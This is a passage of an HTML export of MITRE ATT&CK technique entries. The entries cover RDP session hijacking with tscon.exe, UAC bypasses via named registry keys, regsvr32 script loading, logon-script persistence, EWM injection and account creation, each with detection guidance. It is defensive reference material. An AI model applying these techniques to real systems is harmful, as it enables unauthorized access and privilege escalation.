<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1091">https://attack.mitre.org/wiki/Technique/T1091</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_remote_desktop_protocol_t1076"><a class="anchor" href="#_remote_desktop_protocol_t1076"></a><a class="link" href="#_remote_desktop_protocol_t1076">Remote Desktop Protocol - T1076</a></h3>
<div class="paragraph">
<p>Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). (Citation: TechNet Remote Desktop Services) There are other implementations and third-party tools that provide graphical access Remote Services similar to RDS.</p>
</div>
<div class="paragraph">
<p>Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the Accessibility Features technique for Persistence. (Citation: Alperovitch Malware)</p>
</div>
<div class="paragraph">
<p>Adversaries may also perform RDP session hijacking which involves stealing a legitimate user&#8217;s remote session. Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With System permissions and using Terminal Services Console, &lt;code&gt;c:\windows\system32\tscon.exe [session number to be stolen]&lt;/code&gt;, an adversary can hijack a session without the need for credentials or prompts to the user. (Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions. (Citation: RDP Hijacking Medium) It can also lead to Remote System Discovery and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in RedSnarf. (Citation: Kali Redsnarf)</p>
</div>
<div class="paragraph">
<p>Detection: Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.</p>
</div>
<div class="paragraph">
<p>Also, set up process monitoring for &lt;code&gt;tscon.exe&lt;/code&gt; usage and monitor service creation that uses &lt;code&gt;cmd.exe /k&lt;/code&gt; or &lt;code&gt;cmd.exe /c&lt;/code&gt; in its arguments to prevent RDP session hijacking.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs, Netflow/Enclave netflow, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Remote Desktop Users</p>
</div>
<div class="paragraph">
<p>System Requirements: RDP service enabled, account in the Remote Desktop Users group.</p>
</div>
<div class="paragraph">
<p>Contributors: Matthew Demaske, Adaptforward</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 809. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1076">https://attack.mitre.org/wiki/Technique/T1076</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx">https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/">http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html">http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6">https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/nccgroup/redsnarf">https://github.com/nccgroup/redsnarf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_scheduled_transfer_t1029"><a class="anchor" href="#_scheduled_transfer_t1029"></a><a class="link" href="#_scheduled_transfer_t1029">Scheduled Transfer - T1029</a></h3>
<div class="paragraph">
<p>Data exfiltration may be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.</p>
</div>
<div class="paragraph">
<p>When scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over Command and Control Channel and Exfiltration Over Alternative Protocol.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. Network connections to the same destination that occur at the same time of day for multiple days are suspicious.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Netflow/Enclave netflow, Process use of network, Process monitoring</p>
</div>
<div class="paragraph">
<p>Requires Network: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 810. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1029">https://attack.mitre.org/wiki/Technique/T1029</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bypass_user_account_control_t1088"><a class="anchor" href="#_bypass_user_account_control_t1088"></a><a class="link" href="#_bypass_user_account_control_t1088">Bypass User Account Control - T1088</a></h3>
<div class="paragraph">
<p>Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)</p>
</div>
<div class="paragraph">
<p>If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.</p>
</div>
<div class="paragraph">
<p>Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>&lt;code&gt;eventvwr.exe&lt;/code&gt; can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit)</p>
</li>
</ul>
</div>
<div class="paragraph">
<p>Another bypass is possible through some Lateral Movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC Bypass)</p>
</div>
<div class="paragraph">
<p>Detection: There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of Process Injection and unusual loaded DLLs through DLL Search Order Hijacking, which indicate attempts to gain access to higher privileged processes.</p>
</div>
<div class="paragraph">
<p>Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>The &lt;code&gt;eventvwr.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command&lt;/code&gt; Registry key. (Citation: enigma0x3 Fileless UAC Bypass)</p>
</li>
<li>
<p>The &lt;code&gt;sdclt.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe&lt;/code&gt; and &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand&lt;/code&gt; Registry keys. (Citation: enigma0x3 sdclt app paths) (Citation: enigma0x3 sdclt bypass)</p>
</li>
</ul>
</div>
<div class="paragraph">
<p>Analysts should monitor these Registry settings for unauthorized changes.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: System calls, Process monitoring, Authentication logs, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Effective Permissions: Administrator</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Windows User Account Control</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator</p>
</div>
<div class="paragraph">
<p>Contributors: Stefan Kanthak, Casey Smith</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 811. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1088">https://attack.mitre.org/wiki/Technique/T1088</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works">https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx">https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/ms679687.aspx">https://msdn.microsoft.com/en-us/library/ms679687.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.pretentiousname.com/misc/win7%20uac%20whitelist2.html">http://www.pretentiousname.com/misc/win7%20uac%20whitelist2.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/hfiref0x/UACME">https://github.com/hfiref0x/UACME</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/">https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware">https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass">http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/">https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/">https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_logon_scripts_t1037"><a class="anchor" href="#_logon_scripts_t1037"></a><a class="link" href="#_logon_scripts_t1037">Logon Scripts - T1037</a></h3>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>Windows allows logon scripts to be run whenever a specific user or group of users log into a system. (Citation: TechNet Logon Scripts) The scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server.</p>
</div>
<div class="paragraph">
<p>If adversaries can access these scripts, they may insert additional code into the logon script to execute their tools when a user logs in. This code can allow them to maintain persistence on a single system, if it is a local script, or to move laterally within a network, if the script is stored on a central server and pushed to many systems. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.</p>
</div>
<div class="paragraph">
<p>===Mac===</p>
</div>
<div class="paragraph">
<p>Mac allows login and logoff hooks to be run as root whenever a specific user logs into or out of a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike startup items, a login hook executes as root (Citation: creating login hook). There can only be one login hook at a time though. If adversaries can access these scripts, they can insert additional code to the script to execute their tools when a user logs in.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties.</p>
</div>
<div class="paragraph">
<p>Platforms: macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring</p>
</div>
<div class="paragraph">
<p>System Requirements: Write access to system or domain logon scripts</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 812. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1037">https://attack.mitre.org/wiki/Technique/T1037</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx">https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.apple.com/de-at/HT2420">https://support.apple.com/de-at/HT2420</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_connection_proxy_t1090"><a class="anchor" href="#_connection_proxy_t1090"></a><a class="link" href="#_connection_proxy_t1090">Connection Proxy - T1090</a></h3>
<div class="paragraph">
<p>A connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools)</p>
</div>
<div class="paragraph">
<p>The definition of a proxy can also be expanded out to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other.</p>
</div>
<div class="paragraph">
<p>The network may be within a single organization or across organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion.</p>
</div>
<div class="paragraph">
<p>Detection: Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Network activities disassociated from user-driven actions from processes that normally require user direction are suspicious.</p>
</div>
<div class="paragraph">
<p>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process use of network, Process monitoring, Netflow/Enclave netflow, Packet capture</p>
</div>
<div class="paragraph">
<p>Requires Network: Yes</p>
</div>
<div class="paragraph">
<p>Contributors: Walker Johnson</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 813. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1090">https://attack.mitre.org/wiki/Technique/T1090</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/">http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_regsvr32_t1117"><a class="anchor" href="#_regsvr32_t1117"></a><a class="link" href="#_regsvr32_t1117">Regsvr32 - T1117</a></h3>
<div class="paragraph">
<p>Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: Microsoft Regsvr32)</p>
</div>
<div class="paragraph">
<p>Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.</p>
</div>
<div class="paragraph">
<p>Regsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: SubTee Regsvr32 Whitelisting Bypass) This variation of the technique has been used in campaigns targeting governments. (Citation: FireEye Regsvr32 Targeting Mongolian Gov)</p>
</div>
<div class="paragraph">
<p>Detection: Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Loaded DLLs, Process monitoring, Process command-line parameters, Windows Registry</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Process whitelisting, Anti-virus</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator</p>
</div>
<div class="paragraph">
<p>Remote Support: No</p>
</div>
<div class="paragraph">
<p>Contributors: Casey Smith</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 814. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1117">https://attack.mitre.org/wiki/Technique/T1117</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.microsoft.com/en-us/kb/249873">https://support.microsoft.com/en-us/kb/249873</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/02/spear%20phishing%20techn.html">https://www.fireeye.com/blog/threat-research/2017/02/spear%20phishing%20techn.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_file_and_directory_discovery_t1083"><a class="anchor" href="#_file_and_directory_discovery_t1083"></a><a class="link" href="#_file_and_directory_discovery_t1083">File and Directory Discovery - T1083</a></h3>
<div class="paragraph">
<p>Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.</p>
</div>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>Example utilities used to obtain this information are &lt;code&gt;dir&lt;/code&gt; and &lt;code&gt;tree&lt;/code&gt;. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the Windows API.</p>
</div>
<div class="paragraph">
<p>===Mac and Linux===</p>
</div>
<div class="paragraph">
<p>In Mac and Linux, this kind of discovery is accomplished with the &lt;code&gt;ls&lt;/code&gt;, &lt;code&gt;find&lt;/code&gt;, and &lt;code&gt;locate&lt;/code&gt; commands.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>System Requirements: Some folders may require Administrator, SYSTEM or specific user depending on permission levels and access controls</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 815. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1083">https://attack.mitre.org/wiki/Technique/T1083</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_extra_window_memory_injection_t1181"><a class="anchor" href="#_extra_window_memory_injection_t1181"></a><a class="link" href="#_extra_window_memory_injection_t1181">Extra Window Memory Injection - T1181</a></h3>
<div class="paragraph">
<p>Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data). (Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of extra window memory (EWM) to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)</p>
</div>
<div class="paragraph">
<p>Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the processs memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the processs EWM.</p>
</div>
<div class="paragraph">
<p>Execution granted through EWM injection may take place in the address space of a separate live process. Similar to Process Injection, this may allow access to both the target process&#8217;s memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread. (Citation: Engame Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)</p>
</div>
<div class="paragraph">
<p>Detection: Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Engame Process Injection July 2017)</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Anti-virus, Host intrusion prevention systems, Data Execution Prevention</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 816. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1181">https://attack.mitre.org/wiki/Technique/T1181</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx">https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx">https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx">https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process">https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html">https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/">https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx">https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_create_account_t1136"><a class="anchor" href="#_create_account_t1136"></a><a class="link" href="#_create_account_t1136">Create Account - T1136</a></h3>
<div class="paragraph">
<p>Adversaries with a sufficient level of access may create a local system or domain account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.</p>
</div>
<div class="paragraph">
<p>The &lt;code&gt;net user&lt;/code&gt; commands can be used to create a local or domain account.</p>
</div>
<div class="paragraph">
<p>Detection: Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process Monitoring, Process command-line parameters, Authentication logs, Windows event logs</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 817. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1136">https://attack.mitre.org/wiki/Technique/T1136</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://docs.microsoft.com/windows/device-security/auditing/event-4720">https://docs.microsoft.com/windows/device-security/auditing/event-4720</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_commonly_used_port_t1043"><a class="anchor" href="#_commonly_used_port_t1043"></a><a class="link" href="#_commonly_used_port_t1043">Commonly Used Port - T1043</a></h3>
<div class="paragraph">
<p>Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as
* TCP:80 (HTTP)
* TCP:443 (HTTPS)
* TCP:25 (SMTP)
* TCP/UDP:53 (DNS)</p>
</div>
<div class="paragraph">
<p>They may use the protocol associated with the port or a completely different protocol.</p>
</div>
<div class="paragraph">
<p>For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are
* TCP/UDP:135 (RPC)
* TCP/UDP:22 (SSH)
* TCP/UDP:3389 (RDP)</p>
</div>
<div class="paragraph">
<p>Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Packet capture, Netflow/Enclave netflow, Process use of network, Process monitoring</p>
</div>
<div class="paragraph">
<p>Requires Network: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 818. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1043">https://attack.mitre.org/wiki/Technique/T1043</a></p></td>
</tr>
<tr>
